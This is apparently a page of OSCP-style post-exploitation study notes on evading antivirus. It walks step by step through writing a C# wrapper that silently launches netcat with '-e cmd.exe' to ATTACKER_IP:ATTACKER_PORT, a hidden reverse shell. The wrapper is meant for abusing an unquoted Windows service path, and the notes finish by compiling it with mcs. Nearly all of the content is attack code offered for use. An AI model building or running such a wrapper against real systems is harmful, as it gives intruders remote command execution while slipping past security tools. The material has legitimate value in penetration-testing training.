// notes/ Pivoting & Tunneling
🚀

Av Evasion Executable Obfuscation

{% hint style="info" %}

#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/av-evasion_executable-obfuscation

Executable Obfuscation

{% hint style="info" %} This technique was used to bypass AV while exploiting an Unquoted Service Path {% endhint %}

Make an executable using C#

csharp
01using System;
02using System.Diagnostics;

These lines give us access to basic system functions like start new processes (netcat)

csharp
01using System;
02using System.Diagnostics;
03
04namespace Wrapper{
05 class Program{
06 static void Main(){
07 //Insert rest of code here!
08 }
09 }
10}

This is for initializing a namespace and class for the program itself

csharp
01using System;
02using System.Diagnostics;
03
04namespace Wrapper{
05 class Program{
06 static void Main(){
07 Process proc = new Process();
08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
09 }
10 }
11}

This will start the new netcat process and set the parameters

csharp
01using System;
02using System.Diagnostics;
03
04namespace Wrapper{
05 class Program{
06 static void Main(){
07 Process proc = new Process();
08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
09 procInfo.CreateNoWindow = true;
10 }
11 }
12}

The next added line makes it NOT create a new window while starting

csharp
01using System;
02using System.Diagnostics;
03
04namespace Wrapper{
05 class Program{
06 static void Main(){
07 Process proc = new Process();
08 ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc.exe", "ATTACKER_IP ATTACKER_PORT -e cmd.exe");
09 procInfo.CreateNoWindow = true;
10 proc.StartInfo = procInfo;
11 proc.Start();
12 }
13 }
14}

The last added line will fire off the new process

Compile the source code

code
01mcs wrapper.cs